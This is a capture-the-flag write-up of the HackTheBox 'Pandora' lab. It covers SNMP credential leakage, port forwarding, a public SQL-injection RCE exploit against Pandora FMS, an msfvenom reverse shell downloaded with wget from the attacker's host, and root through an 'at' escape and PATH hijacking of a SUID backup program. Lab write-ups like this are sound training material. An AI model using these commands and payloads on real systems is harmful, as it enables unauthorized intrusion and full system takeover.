Hi everyone! Today’s write-up is on Pandora, an easy GNU/Linux machine released on 10th January 2022. I won’t say the machine is easy if you are those who build the SQL injection exploit from scratch. Someone actually build the PoC exploit for an old CVE recently for this HackTheBox challenge so I leached on it. This machine is a good practice for OSCP especially since the foothold of this machine is similar to a retired OSCP exam machine. When I am writing this article, it is not in TJ Null’s OSCP list yet. Maybe it will be added in the future.
To give you a brief overview of this machine, this machine requires enumerating of the SNMP service, pivoting or port forwarding, finding an SQL vulnerability in an internal website, crafting your own SQL injection exploit or using an existing exploit created by someone for this challenge, escape seteuid() privilege escalation restriction due to old version of libapache2-mpm-itk used by the Apache2 service in the machine, and finally privilege escalation using path hijacking of a SUID program. Let’s get started!
Nmap enumeration
kali@kali~$ IP=10.10.11.136 kali@kali~$ sudo nmap -n -p- $IP ... Not shown: 65533 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http kali@kali~$ sudo nmap -sC -sV -p22,80 $IP ... PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA) | 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA) |_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Play | Landing Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
SNMP enumeration
kali@kali~$ snmp-check $IP ... [*] Processes: Id Status Name Path Parameters ... 845 runnable sh /bin/sh -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'
Via the SNMP service, we are able to find credentials placed on the command line in one of the processes.
SSH into the machine
As we have the credential, we can try to SSH into the machine since SSH service is available.
kali@kali~$ ssh daniel@$IP The authenticity of host '10.10.11.136 (10.10.11.136)' can't be established. ECDSA key fingerprint is SHA256:9urFJN3aRYRRc9S5Zc+py/w4W6hmZ+WLg6CyrY+5MDI. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.11.136' (ECDSA) to the list of known hosts. daniel@10.10.11.136's password: HotelBabylon23 Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Sun 30 Jan 08:32:05 UTC 2022 System load: 0.0 Processes: 444 Usage of /: 72.3% of 4.87GB Users logged in: 1 Memory usage: 23% IPv4 address for eth0: 10.10.11.136 Swap usage: 0% => /boot is using 91.8% of 219MB 0 updates can be applied immediately. The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings daniel@pandora:~$
Access matt’s account
If we look at matt’s home directory, we can see the user flag file is there but is only readable by root or matt’s account.
daniel@pandora:~$ ls /home daniel matt daniel@pandora:~$ ls -l /home/matt/ -rw-r----- 1 root matt 33 Jan 30 08:44 user.txt
Discovering localhost web service
Checking out the /var/www folder, I see another directory called “pandora” while the “html” folder contains the not interesting public-facing website which we already saw the service on Nmap enumeration. This can be further verified by seeing the configuration file.
daniel@pandora:~$ cd /var/www daniel@pandora:/var/www$ ls html pandora daniel@pandora:/var/www$ ls /etc/apache2/sites-available/ 000-default.conf default-ssl.conf pandora.conf daniel@pandora:/var/www$ cat /etc/apache2/sites-available/pandora.conf <VirtualHost localhost:80> ServerAdmin admin@panda.htb ServerName pandora.panda.htb DocumentRoot /var/www/pandora AssignUserID matt matt <Directory /var/www/pandora> AllowOverride All </Directory> ErrorLog /var/log/apache2/error.log CustomLog /var/log/apache2/access.log combined </VirtualHost>
We can see that it is only accessible via localhost. Besides that, the assigned user is matt.
Pivoting and accessing the internal website
We can use SSH port forwarding to do so.
kali@kali~$ ssh daniel@$IP -L 80:localhost:80 daniel@10.10.11.136's password: HotelBabylon23
This allows us to access the internal website.
The bottom of the website shows us that the website is running on version v7.0NG.742_FIX_PERL2020. A quick Google allows us to find vulnerabilities on the website here as well as unauthenticated SQL injection exploit here.
Remote Code Execution (RCE)
Firstly, we need to download the exploit recently done by someone. Of course you can choose to read the article and come up with your own exploit.
kali@kali~$ git clone https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated.git
Finally, we can run the exploit using Python3. We will receive a “shell” which is actually just Remote Code Execution (RCE).
kali@kali~$ cd Pandora_v7.0NG.742_exploit_unauthenticated kali@kali:Pandora_v7.0NG.742_exploit_unauthenticated$ python3 sqlpwn.py -t localhost URL: http://localhost/pandora_console [+] Sending Injection Payload [+] Requesting Session [+] Admin Session Cookie : j8cgngqha6bemscvkv72iv2rfr [+] Sending Payload [+] Respose : 200 [+] Pwned 🙂 [+] If you want manual Control : http://localhost/pandora_console/images/pwn.php?test= CMD > whoami matt CMD >
Understanding RCE Exploit (optional)
Following the OSCP way, we will need to obtain a reverse shell as RCE is not allowed. Hence, we first need to see what architecture is the machine using.
CMD > uname -a Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
Since we now know it is a 64-bits machine, we can generate a reverse shell using msfvenom. Remember to change the LHOST to your own machine’s IP address. We can host an HTTP server so that the machine can download it from our Kali using wget. Not sure why port 22 doesn’t work. I guess the IP table must have restricted outbound traffic to only allow probably port 80 and 443.
kali@kali~$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.49 LPORT=443 -f elf > shellx64.elf [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 74 bytes Final size of elf file: 194 bytes kali@kali~$ sudo python3 -m http.server 443 Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ...
Download it using the RCE “shell”. We must change its permission before executing it later.
CMD > wget http://10.10.14.49:443/shellx64.elf -O /tmp/shellx64.elf CMD > chmod 755 /tmp/shellx64.elf CMD > ls -l /tmp total 8 -rwxr-xr-x 1 matt matt 194 Jan 30 16:56 shellx64.elf -rwxrwxrwx 1 matt matt 10 Jan 30 13:00 tar
Close the HTTP server and use Netcat to listen for an incoming reverse shell connection.
kali@kali~$ nc -lvnp listening on [any] 443 ...
Finally, we can execute the file using the “RCE” shell. Our Netcat should receive a shell. I made the shell TTY.
CMD > /tmp/shellx64.elf
kali@kali~$ nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.49] from (UNKNOWN) [10.10.11.136] 51122 python3 -c 'import pty; pty.spawn("/bin/bash")' matt@pandora:/var/www/pandora/pandora_console/images$
Obtaining user flag
matt@pandora:/var/www/pandora/pandora_console/images$ cd /home/matt matt@pandora:/home/matt$ ls user.txt matt@pandora:/home/matt$ cat user.txt 36f**************************
Privilege escalation
SUID
When searching for SUID programs, I notice an interesting SUID program related to the website’s name.
matt@pandora:/home/matt$ find / -perm /4000 2>/dev/null /usr/bin/sudo /usr/bin/pkexec /usr/bin/chfn /usr/bin/newgrp /usr/bin/gpasswd /usr/bin/umount /usr/bin/pandora_backup /usr/bin/passwd /usr/bin/mount /usr/bin/su /usr/bin/at /usr/bin/fusermount /usr/bin/chsh /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /usr/lib/policykit-1/polkit-agent-helper-1
When I tried to run the file, I was greeted with an error message.
matt@pandora:/home/matt$ /usr/bin/pandora_backup PandoraFMS Backup Utility Now attempting to backup PandoraFMS client tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied tar: Error is not recoverable: exiting now Backup failed! Check your permissions!
When I try to read the file content, I noticed a string with the full command of what the program is running.
matt@pandora:/home/matt$ hexdump -C /usr/bin/pandora_backup ... 00002000 01 00 02 00 00 00 00 00 50 61 6e 64 6f 72 61 46 |........PandoraF| 00002010 4d 53 20 42 61 63 6b 75 70 20 55 74 69 6c 69 74 |MS Backup Utilit| 00002020 79 00 00 00 00 00 00 00 4e 6f 77 20 61 74 74 65 |y.......Now atte| 00002030 6d 70 74 69 6e 67 20 74 6f 20 62 61 63 6b 75 70 |mpting to backup| 00002040 20 50 61 6e 64 6f 72 61 46 4d 53 20 63 6c 69 65 | PandoraFMS clie| 00002050 6e 74 00 00 00 00 00 00 74 61 72 20 2d 63 76 66 |nt......tar -cvf| 00002060 20 2f 72 6f 6f 74 2f 2e 62 61 63 6b 75 70 2f 70 | /root/.backup/p| 00002070 61 6e 64 6f 72 61 2d 62 61 63 6b 75 70 2e 74 61 |andora-backup.ta| 00002080 72 2e 67 7a 20 2f 76 61 72 2f 77 77 77 2f 70 61 |r.gz /var/www/pa| 00002090 6e 64 6f 72 61 2f 70 61 6e 64 6f 72 61 5f 63 6f |ndora/pandora_co| 000020a0 6e 73 6f 6c 65 2f 2a 00 42 61 63 6b 75 70 20 66 |nsole/*.Backup f| 000020b0 61 69 6c 65 64 21 0a 43 68 65 63 6b 20 79 6f 75 |ailed!.Check you| 000020c0 72 20 70 65 72 6d 69 73 73 69 6f 6e 73 21 00 42 |r permissions!.B| 000020d0 61 63 6b 75 70 20 73 75 63 63 65 73 73 66 75 6c |ackup successful| 000020e0 21 00 54 65 72 6d 69 6e 61 74 69 6e 67 20 70 72 |!.Terminating pr| 000020f0 6f 67 72 61 6d 21 00 00 01 1b 03 3b 3c 00 00 00 |ogram!.....;<...| 00002100 06 00 00 00 28 ef ff ff 88 00 00 00 88 ef ff ff |....(...........|
Based on the command, tar is being executed but its full path is not stated. As a result, we can do a path hijacking.
Fixing seteuid()
While doing path hijacking, I stumble across an issue where /usr/bin/pandora_backup is not running as root. If we run “sudo -l” we will realized there is an error.
matt@pandora:/var/www/pandora/pandora_console/DEBIAN$ sudo -l sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted sudo: unable to initialize policy plugin
A quick Google allows me to find out an old package of libapache2-mpm-itk breaks syscall functions like seteuid(). You can see articles about them in this StackOverflow post and official bug report. Looking at the machine’s apache2 library, we can see it is using a late 2013 mpm-itk package that has this bug.
matt@pandora:/home/matt$ find / -name libapache2-mpm-itk 2>/dev/null /usr/share/doc/libapache2-mpm-itk matt@pandora:/home/matt$ ls /usr/share/doc/libapache2-mpm-itk README.Debian changelog.Debian.gz copyright matt@pandora:/home/matt$ cat /usr/share/doc/libapache2-mpm-itk/README* mpm-itk for Debian ------------------ Note that mpm-itk has gone from being a true MPM to just being a module that hooks into prefork. You can safely remove the old apache2-mpm-itk package if you still have it installed. -- Steinar H. Gunderson <sesse@debian.org> Thu, 07 Nov 2013 20:16:19 +0100
Thus, we can break out of the restricted environment using at command by copying and pasting the full command with arguments from GTFObins here.
matt@pandora:/home/matt$ echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null warning: commands will be executed using /bin/sh job 4 at Mon Jan 31 03:13:00 2022 /bin/sh: 0: can't access tty; job control turned off $
Path hijacking
In the SSH session in Daniel’s account, use nano to create a file in Daniel’s home directory. Somehow my reverse shell is having a hard time creating the exploit file. Thus, using the SSH session is easier.
dnaiel@pandora:~$ mkdir spoiler
daniel@pandora:~$ cd spoiler/ daniel@pandora:~/spoiler$ nano tar
In the tar file, I copy the bash file and make it SUID so that I don’t need another reverse shell which is troublesome.
#!/bin/bash cp /bin/bash /home/matt/bash chmod u+s /home/matt/bash
Once saved the file, change the permission to allow everyone to execute.
daniel@pandora:~/spoiler$ chmod 777 tar
Finally, change the environmental PATH to daniel’s home directory before executing it.
$ export PATH="/home/daniel/spoiler:$PATH" $ /usr/bin/pandora_backup PandoraFMS Backup Utility Now attempting to backup PandoraFMS client Backup successful! Terminating program! $ ls -l total 1160 -rwsr-xr-x 1 root matt 1183448 Jan 31 03:15 bash -rw-r----- 1 root matt 33 Jan 30 08:44 user.txt
Spawn root shell
Since bash’s owner is now root with SUID set, we can spawn it as root.
$ ./bash -p bash: cannot set terminal process group (833): Inappropriate ioctl for device bash: no job control in this shell bash-5.0# id uid=1000(matt) gid=1000(matt) euid=0(root) groups=1000(matt) bash-5.0#
Obtaining root flag
bash-5.0# cd /root bash-5.0# ls root.txt bash-5.0# cat root.txt d94****************************
I hope these tabs have been helpful to you. Feel free to leave any comments below. If you like my content, do follow me via email. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂
Lamecarrot 